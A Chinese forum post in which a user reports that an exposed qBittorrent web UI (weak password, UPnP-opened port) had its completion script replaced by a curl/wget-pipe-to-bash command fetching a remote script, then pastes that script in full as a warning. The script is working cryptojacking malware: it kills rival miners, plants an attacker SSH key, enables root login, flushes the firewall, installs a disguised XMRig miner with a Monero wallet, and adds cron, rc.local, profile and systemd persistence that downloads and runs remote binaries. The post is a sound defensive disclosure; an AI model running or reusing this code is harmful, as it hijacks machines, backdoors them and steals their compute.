qBittorrent web 端 弱密码 + 开启 UPNP 被挂恶意脚本

今天回家，照常下载种子并导入到我的 qBittorrent ， 准备美滋滋地看会电视剧。

由于之前设置了种子完成后自动执行脚本，正常情况应该会自动创建一个到资料库目录的软链接，但今天种子下载好后脚本却没有照常执行。

检查之后吓了一跳，原本的自动执行程序被替换为以下脚本。

bash -c "(curl -s -L http://files.catbox.moe/o0gr8o.sh || wget --no-check-certificate -O - http://files.catbox.moe/o0gr8o.sh) | bash" 

检查了一下，是我的 QB 默认开启了 upnp ，家里是公网 IP ，等于直接在公网 8085 端口裸奔了。

我用的群晖 DS220+和矿神的 qBittorrent 应用，暂时没有发现有损失。

提醒一下大家注意防范，贴一下这个脚本的内容。

#! /bin/bash ## VERSION=e4 # Arguments #[email protected] WALLET=41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b [email protected] PORT=15555 AUDITD=http://files.catbox.moe/5eki22.out function prune_competition() { sudo systemctl stop c3pool_miner.service 2>&1 sudo systemctl disable c3pool_miner.service 2>&1 sudo systemctl disable xmrig.service 2>&1 sudo systemctl stop journalctld.service 2>&1 sudo systemctl disable journalctld.service 2>&1 kill -9 $(pidof xmrig) >/dev/null 2>&1 kill $(ps aux | grep "[--]cOnfig=" | awk '{print $2}') 2>&1 sudo killall xmrig 2>&1 sudo pkill xmrig 2>&1 sudo pkill auditd 2>&1 killall -9 xmrig 2>&1 killall xmrig 2>&1 pkill xmrig 2>&1 pkill auditd 2>&1 killall auditd 2>&1 rm -rf rm -rf /root/.local/.c 2>&1 rm -rf "${HOME}/.c3pool" >/dev/null 2>&1 rm -rf /root/.c3pool >/dev/null 2>&1 rm -rf "${HOME}/.local/share/auditd" >/dev/null 2>&1 rm -rf "${HOME}/.local/.c*" >/dev/null 2>&1 rm -rf "${HOME}/.local/bin/auditd" rm -rf /etc/cron.daily >/dev/null 2>&1 rm -rf /etc/cron.daily/auditd >/dev/null 2>&1 rm -rf /etc/systemd/system/journalctld.service 2>&1 find . -name "*c3pool*" -exec rm -rf {} \; 2>&1 find . -name "*xmrig*" -exec rm -rf {} \; 2>&1 find . -name "*miner*" -exec rm -rf {} \; 2>&1 find $HOME -name "*c3pool*" -exec rm -rf {} \; 2>&1 find $HOME -name "*xmrig*" -exec rm -rf {} \; 2>&1 find $HOME -name "*miner*" -exec rm -rf {} \; 2>&1 find $HOME -name "*c4*" -exec rm -rf {} \; 2>&1 find $HOME -name "*auditd*" -exec rm -rf {} \; 2>&1 sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d' "${HOME}/.ssh/authorized_keys" sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d' "/root/.ssh/authorized_keys" sed -i '/c3pool/d;/miner.sh/d' "${HOME}/.profile" sed -i '/c3pool/d;/miner.sh/d' "/root/.profile" mkdir $HOME/.ssh ; touch $HOME/.ssh/authorized_keys ; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi3pUF++QmmM6Jo4/wMWqOxmdJotN85QpbkRfYuw9QN5aO35RLSJw7o2UOXN9vsaxnIg9wunNstVff22vyjrFrXTNrHaI///P3d4T4w6CCgLlNdNKgKTG176Y7KBmkWWeZvd8phtIaMprhGSbtnvs4v0hADTw+Ej20EeKfphlZsRSVS6zObq6jro4j8iIXvnGEdkIx8b1SP+QK6D+ZOEQxEzD107latrwYbLCNHWX7VP1oK6fbFk3zU+CGOwITiVPKuyX9aNFJVEopZSmreD+b+JoXpYHybiuhL3ex79uCWNWKnfGgBKrSAmnmopvYnd/mQ902ls16j/Cr/YYKhUvFMC7MhuWdazvM9uFT07c8PSPsEJ+vJpW3t2HQkW89mxqjp1rEvURUlqZtkL/3hZEMaamP6phHpSttncyWiMGuLZxoub/2GM8C09+GOOTaf47//mGxtNs5FNWqjyiznznrc=" >> $HOME/.ssh/authorized_keys ; chmod 600 $HOME/.ssh/authorized_keys (chmod go-w ~/ && chmod go-w /root && chmod 700 ~/.ssh && chmod 700 /root/.ssh && chmod 600 ~/.ssh/authorized_keys && chown root /root && chown root /root/.ssh) >/dev/null sudo sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config >/dev/null sudo sed -i 's/#PubkeyAuthentication yes/PubkeyAuthentication yes/' /etc/ssh/sshd_config >/dev/null iptables -P INPUT ACCEPT 2>&1 iptables -P FORWARD ACCEPT 2>&1 iptables -P OUTPUT ACCEPT 2>&1 iptables -F 2>&1 ufw disable 2>&1 } function install_auditd() { mkdir -p ${HOME}/.local/share/ cat >${HOME}/.local/share/auditd <<EOL #!/bin/bash if [ -z "\$(pidof auditd)" ]; then mkdir -p ${HOME}/.local/bin curl -s4 -L "${AUDITD}" -o ${HOME}/.local/bin/auditd chmod a+x ${HOME}/.local/bin/auditd ${HOME}/.local/bin/auditd sleep 5 rm ${HOME}/.local/bin/auditd fi EOL chmod a+x "${HOME}/.local/share/auditd" mkdir -p /etc/cron.daily if ! grep "${AUDITD}" "/etc/cron.daily/auditd" >/dev/null; then cp ${HOME}/.local/share/auditd /etc/cron.daily/auditd fi (${HOME}/.local/share/auditd || /etc/cron.daily/auditd) & } function install_rig() { mkdir -p "${HOME}/.local/.c" "${HOME}/.local/.c/journalctld" --help >/dev/null 2>&1 if test $? -ne 0; then # Attempt to download LATEST_LINUX_RELEASE=$(curl -s4 https://api.github.com/repos/xmrig/xmrig/releases/latest | grep browser_download | grep linux-static | cut -d'"' -f4) if ! curl -s4 -L "${LATEST_LINUX_RELEASE}" -o /tmp/xmrig.tar.gz; then exit 1 fi # Attempt to extract if ! tar xf /tmp/xmrig.tar.gz -C "${HOME}/.local/.c" --strip=1; then exit 1 fi rm /tmp/xmrig.tar.gz mv "${HOME}/.local/.c/xmrig" "${HOME}/.local/.c/journalctld" # Check if downloaded "${HOME}/.local/.c/journalctld" --help >/dev/null if test $? -ne 0; then exit 1 fi fi PASS=$(hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g') # Config COnFIG="${HOME}/.local/.c/config.json" sed -i 's/"url": *"[^"]*",/"url": "mine.c3pool.com:'"${PORT}"'",/' "${CONFIG}" sed -i 's/"user": *"[^"]*",/"user": "'"${WALLET}"'",/' "${CONFIG}" sed -i 's/"pass": *"[^"]*",/"pass": "'"${PASS}"'",/' "${CONFIG}" sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' "${CONFIG}" sed -i 's#"log-file": *null,#"log-file": "'"${HOME}/.local/.c/journalctld.log"'",#' "${CONFIG}" sed -i 's/"syslog": *[^,]*,/"syslog": false,/' "${CONFIG}" sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 75,/' "${CONFIG}" sed -i 's/"background": *[^,]*,/"background": false,/' "${CONFIG}" # Config (background) cp "${CONFIG}" "${HOME}/.local/.c/config_background.json" sed -i 's/"background": *false,/"background": true,/' "${HOME}/.local/.c/config_background.json" # Prepare start script cat >"${HOME}/.local/.c/journalctl" <<EOL #!/bin/bash if [ -z "\$(pidof auditd)" ]; then curl -s4 -L "${AUDITD}" -o /tmp/auditd chmod a+x /tmp/auditd /tmp/auditd rm /tmp/auditd fi if [ -z "\$(pidof journalctld)" ]; then nice ${HOME}/.local/.c/journalctld \$* fi EOL chmod +x "${HOME}/.local/.c/journalctl" # Prepare persistence if ! grep journalctl "${HOME}/.profile" >/dev/null; then echo "${HOME}/.local/.c/journalctl --cOnfig=${HOME}/.local/.c/config_background.json >/dev/null 2>&1" >> "${HOME}/.profile" fi if ! grep journalctl "/etc/rc.local" >/dev/null; then echo "#!/bin/bash" > "/etc/rc.local" echo "${HOME}/.local/.c/journalctl --cOnfig=${HOME}/.local/.c/config_background.json >/dev/null 2>&1" >> "/etc/rc.local" && chmod a+x "/etc/rc.local" fi if sudo -n true 2>/dev/null; then # Attempt to configure huge pages if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') -gt 3500000 ]]; then echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc))) fi if ! type systemctl >/dev/null; then /bin/bash "${HOME}/.local/.c/journalctl" --cOnfig="${HOME}/.local/.c/config_background.json" >/dev/null 2>&1 else cat >/tmp/journalctld.service <<EOL [Unit] Description=systemd journaling [Service] ExecStart=${HOME}/.local/.c/journalctl --cOnfig=${HOME}/.local/.c/config.json Restart=always Nice=10 CPUWeight=1 [Install] WantedBy=multi-user.target EOL sudo mv /tmp/journalctld.service /etc/systemd/system/journalctld.service sudo killall journalctld 2>/dev/null sudo systemctl daemon-reload sudo systemctl enable journalctld.service sudo systemctl restart journalctld.service fi fi if [ -z "$(pidof journalctld)" ]; then /bin/bash "${HOME}/.local/.c/journalctl" --cOnfig="${HOME}/.local/.c/config_background.json" >/dev/null 2>&1 fi } # Run processes prune_competition install_auditd install_rig # Version echo "${VERSION}" > "${HOME}/.local/.c/.version" sudo /etc/init.d/ssh restart >/dev/null